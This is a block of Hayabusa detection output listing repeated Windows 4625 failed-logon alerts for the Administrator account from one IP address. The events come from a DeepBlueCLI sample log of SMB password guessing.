+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBMu96oqO9tb3f4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO04Q3eYdzyuy51v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FrIa2UrSrfdhkDCx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axhhyMrGl95O16Vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atjvfi8QeEDluhL2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HPBZKUiiKeyQwSr | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2SmitfyjO4mxqw5E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nrq1g8ktTQbPTXqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 943GV3t1muba5IQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPVd28zf85AxdGqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D6evoSSxcKkHspuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.051 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C4fznmrnIdUH7DzG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwrrYjUV41P0K5Jh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4RBZrALEnH5BKP9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LU6uWH4gs4iHP7rV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCfhZDAH8ufk77zN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TE9pw4UeRldGeKVc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8PKE05MqxE5TwXT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GIE5fmddOPBbCM3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pveyo4Czx6KWKCGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPyyHaRnBec7Qg2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3b8mudJp5mdkiEW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Y6mjLaCzR28Q2qK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dMsNKWEjeCYYQVqw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7c5fENhkwO6QfEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cr1wAeMhPgVpwV82 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErpp9Ww6LO37C9k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYsNpBsGT5zOKe3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgzUk1Dmttm4AQ3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hp0c3YYyOSJuBHCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gkis4H1MIQPHUwqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lb6mH03qKLb8O7Dz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J10xEmhRNWfJ5FCI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Dujj8A7wwzAwzCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVDE3fIoUQfLn3cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UlD48O0XpFUnuSmo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KyTPKuspADmLpv0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BdIAPiH32ZbmCgTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dEiN2xOA4E9Wl5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBeAez2fLjXB0dk3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gQ45aeMDc3Snabvv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWSYdr4lJlhCLMMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgxHY7072aUCdfa0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9yKhEodJDTVCGdIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z0odyPQmvkGRNWZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b5uRpG0fxCK75DPV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d9dcEzpJRW5YA8Bj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv3B9bwB1YIaBa6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJf9Obml4aVxE5zp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mvnSOaRSkGU6Uf5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JSAkZsZsv0SaLKaO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6rnM6QbwfbbrcGy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RX0GW7K5wdQJUx4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xm7CpD5i735McsvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bHxjZsnR25J47Ez8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1JWj91m79FyykH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h9i0GncOzpz5REWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BODZRJ6G3xxw29VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ2lq4piINfmI7Qe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NqDeXdOitJ3WY8w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FnoHQf7QDxoI4tel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqkbgrtBa5VFxPry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TMD57GtY15bfWBre | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3lT9UgWr82PcAjf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SpwhTfFlvvccnI5N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 10CfKdnvWf4UVuME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYLMax3okIqntHM1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qk9TPAK51EdVORwY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVKRUnNu2nGslW7P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJ2AYRLcMbMVixg6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Sl9ucxM2Nu3xjNq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AFeBGB6qA7OaYV7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLUEKG9CzQYsH3Vp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVZ44YKdRYY59zaC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
